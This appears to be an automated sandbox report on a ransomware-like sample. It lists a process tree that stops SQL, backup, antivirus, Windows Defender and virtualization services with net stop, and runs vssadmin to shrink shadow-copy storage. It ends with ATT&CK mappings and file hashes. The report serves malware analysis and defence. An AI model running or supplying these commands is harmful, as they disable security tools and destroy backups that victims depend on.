C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"3⤵PID:3528
-
C:\Windows\system32\net.exenet stop "SQLAgent$CXDB"4⤵PID:4988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CXDB"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"3⤵PID:4052
-
C:\Windows\system32\net.exenet stop "SQLAgent$CITRIX_METAFRAME"4⤵PID:4508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"5⤵PID:2908
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQL Backups"3⤵PID:3684
-
C:\Windows\system32\net.exenet stop "SQL Backups"4⤵PID:2108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups"5⤵PID:888
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"3⤵PID:2696
-
C:\Windows\system32\net.exenet stop "MSSQL$PROD"4⤵PID:1616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROD"5⤵PID:976
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"3⤵PID:1372
-
C:\Windows\system32\net.exenet stop "Zoolz 2 Service"4⤵PID:4400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service"5⤵PID:1928
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"3⤵PID:3000
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper"4⤵PID:664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper"5⤵PID:3424
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"3⤵PID:964
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROD"4⤵PID:364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROD"5⤵PID:2412
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4628 -
C:\Windows\system32\net.exenet stop "msftesql$PROD"4⤵PID:2256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "msftesql$PROD"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3860
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"3⤵PID:1688
-
C:\Windows\system32\net.exenet stop "NetMsmqActivator"4⤵PID:4224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator"5⤵PID:1416
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EhttpSrv"3⤵PID:4568
-
C:\Windows\system32\net.exenet stop "EhttpSrv"4⤵PID:4012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EhttpSrv"5⤵PID:4588
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ekrn"3⤵PID:4196
-
C:\Windows\system32\net.exenet stop "ekrn"4⤵PID:1368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ekrn"5⤵PID:4004
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ESHASRV"3⤵PID:4200
-
C:\Windows\system32\net.exenet stop "ESHASRV"4⤵PID:3972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ESHASRV"5⤵PID:1556
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"3⤵PID:4432
-
C:\Windows\system32\net.exenet stop "MSSQL$SOPHOS"4⤵PID:4632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SOPHOS"5⤵PID:2636
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"3⤵PID:1388
-
C:\Windows\system32\net.exenet stop "SQLAgent$SOPHOS"4⤵PID:5028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SOPHOS"5⤵PID:904
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AVP"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4528 -
C:\Windows\system32\net.exenet stop "AVP"4⤵PID:416
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AVP"5⤵PID:3932
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "klnagent"3⤵PID:4756
-
C:\Windows\system32\net.exenet stop "klnagent"4⤵PID:4804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "klnagent"5⤵PID:1268
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"3⤵PID:1220
-
C:\Windows\system32\net.exenet stop "MSSQL$SQLEXPRESS"4⤵PID:4500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"5⤵PID:5060
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"3⤵PID:5036
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQLEXPRESS"4⤵PID:4836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"5⤵PID:940
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵PID:2452
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵PID:4820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵PID:5008
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "HvHost"3⤵PID:2304
-
C:\Windows\system32\net.exenet stop "HvHost"4⤵PID:2024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "HvHost"5⤵PID:900
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"3⤵PID:4792
-
C:\Windows\system32\net.exenet stop "vmickvpexchange"4⤵PID:4772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmickvpexchange"5⤵PID:2864
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"3⤵PID:3152
-
C:\Windows\system32\net.exenet stop "vmicguestinterface"4⤵PID:680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicguestinterface"5⤵PID:1844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicshutdown"3⤵PID:852
-
C:\Windows\system32\net.exenet stop "vmicshutdown"4⤵PID:1232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicshutdown"5⤵PID:1384
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"3⤵PID:1908
-
C:\Windows\system32\net.exenet stop "vmicheartbeat"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4892 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicheartbeat"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmcompute"3⤵PID:4888
-
C:\Windows\system32\net.exenet stop "vmcompute"4⤵PID:2724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmcompute"5⤵PID:1184
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvmsession"3⤵PID:4884
-
C:\Windows\system32\net.exenet stop "vmicvmsession"4⤵PID:2768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvmsession"5⤵PID:2060
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicrdv"3⤵PID:4512
-
C:\Windows\system32\net.exenet stop "vmicrdv"4⤵PID:984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicrdv"5⤵PID:3496
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmictimesync"3⤵PID:4880
-
C:\Windows\system32\net.exenet stop "vmictimesync"4⤵PID:4896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmictimesync"5⤵PID:268
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvss"3⤵PID:3120
-
C:\Windows\system32\net.exenet stop "vmicvss"4⤵PID:2020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss"5⤵PID:4876
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMAuthdService"3⤵PID:3148
-
C:\Windows\system32\net.exenet stop "VMAuthdService"4⤵
- Drops startup file
PID:3724 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMAuthdService"5⤵PID:3392
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"3⤵PID:2236
-
C:\Windows\system32\net.exenet stop "VMnetDHCP"4⤵PID:4240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMnetDHCP"5⤵PID:2124
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"3⤵PID:2632
-
C:\Windows\system32\net.exenet stop "VMware NAT Service"4⤵PID:4364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"5⤵PID:3904
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"3⤵PID:3324
-
C:\Windows\system32\net.exenet stop "VMUSBArbService"4⤵PID:2984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMUSBArbService"5⤵PID:1464
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMwareHostd"3⤵PID:3228
-
C:\Windows\system32\net.exenet stop "VMwareHostd"4⤵PID:2324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMwareHostd"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sense"3⤵
- Adds Run key to start application
PID:3620 -
C:\Windows\system32\net.exenet stop "Sense"4⤵PID:1940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sense"5⤵PID:2716
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WdNisSvc"3⤵PID:4296
-
C:\Windows\system32\net.exenet stop "WdNisSvc"4⤵PID:4420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WdNisSvc"5⤵PID:4376
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WinDefend"3⤵PID:5024
-
C:\Windows\system32\net.exenet stop "WinDefend"4⤵PID:4120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"5⤵PID:2240
-
-
-
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3796
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
1File Deletion
2Hidden Files and Directories
1Indicator Removal on Host
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD553dab3a3443e1439e53220aff1e7490f
SHA14222d1841951b87cd54516d3381f8358791fd988
SHA256ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4
SHA5125ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5
-
Filesize
621B
MD5edb2c94c58363c1d8e428506e28d669f
SHA150041c9b823d76a932788d553b07cc25297a0ff7
SHA256428ad5fade332e703436d51e6b11ab06fad9e57089088b99e9b53372351b6efc
SHA512024fd02ed3327cd59c6f1cbe24786f27852278d67354c5edf2e5acb1f58bbf0aa1d8114cbdd0b02904f98c5f02393c1f3887a924e6fdb4e75b53db29ff50ed1a
-
Filesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
Filesize
14B
MD5db84d0324aeb1f2a9c496b293adef33d
SHA179bc8117faef8c4f2273358b43c1280f0e70deea
SHA2569c41ce9bd8f0cb76d508a6a5d81ddb65524ff158028ec13c0d93cbb22dcf91ab
SHA512e12798d4a2260cc0bc09853359434813a1103b1517537e4129b9dcc06674b26359bb5815db56b04e2ef44667ab686618a164d7243e0ac609c6b62ddb88e3f407
-
Filesize
1KB
MD599a04b59f115e55249d7323a446446df
SHA1942399e4cb0d49fcf386b352f5bbc9f4ce4ae832
SHA256af9eb20d3ce3aa9fc78c257c5b7c3e77c5d812d99a870283cf6970a7b2bfd3e3
SHA51225a11ce27c1b15f0df3eb1c91ff04b095297d4a2ab14f6e681b68b60855e8d0386892a5bf6580db212484277c6d7aa4b3fedeeb74298f97cdd41b327a6bba22d
-
Filesize
204B
MD507c7fc3eb4a68e9e968c0a7e22fb1092
SHA19d3804e00636a82d6d74812d6c6a4dcecaf5ef5d
SHA2560f880c9481db083d9872faec40139e2a2b99eeae1fa98717634a51b84aeeb99b
SHA51260d1a7f2620b526bec9378962566966deb53238a22610d5a728a0118d8f6ca2153c69dca6dedd87248f967736b1c31329adc07c930e5ccac467436d264eb580f
-
Filesize
8KB
MD553dab3a3443e1439e53220aff1e7490f
SHA14222d1841951b87cd54516d3381f8358791fd988
SHA256ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4
SHA5125ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5
-
Filesize
621B
MD5edb2c94c58363c1d8e428506e28d669f
SHA150041c9b823d76a932788d553b07cc25297a0ff7
SHA256428ad5fade332e703436d51e6b11ab06fad9e57089088b99e9b53372351b6efc
SHA512024fd02ed3327cd59c6f1cbe24786f27852278d67354c5edf2e5acb1f58bbf0aa1d8114cbdd0b02904f98c5f02393c1f3887a924e6fdb4e75b53db29ff50ed1a
-
Filesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
Filesize
30KB
MD533f7fc301be9d39fcb474fb8b1e5f42e
SHA1a3bf9ddb2ac53bc4b12b249825189a7c7a07b766
SHA25699cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03
SHA5126cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00
-
Filesize
78KB
MD53257eb22824b57fe3d58074bca3128d3
SHA16f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97
SHA2565afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad
SHA5127b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d
-
Filesize
14B
MD5db84d0324aeb1f2a9c496b293adef33d
SHA179bc8117faef8c4f2273358b43c1280f0e70deea
SHA2569c41ce9bd8f0cb76d508a6a5d81ddb65524ff158028ec13c0d93cbb22dcf91ab
SHA512e12798d4a2260cc0bc09853359434813a1103b1517537e4129b9dcc06674b26359bb5815db56b04e2ef44667ab686618a164d7243e0ac609c6b62ddb88e3f407
-
Filesize
1KB
MD599a04b59f115e55249d7323a446446df
SHA1942399e4cb0d49fcf386b352f5bbc9f4ce4ae832
SHA256af9eb20d3ce3aa9fc78c257c5b7c3e77c5d812d99a870283cf6970a7b2bfd3e3
SHA51225a11ce27c1b15f0df3eb1c91ff04b095297d4a2ab14f6e681b68b60855e8d0386892a5bf6580db212484277c6d7aa4b3fedeeb74298f97cdd41b327a6bba22d
-
Filesize
8KB
MD553dab3a3443e1439e53220aff1e7490f
SHA14222d1841951b87cd54516d3381f8358791fd988
SHA256ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4
SHA5125ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5
-
Filesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
Filesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba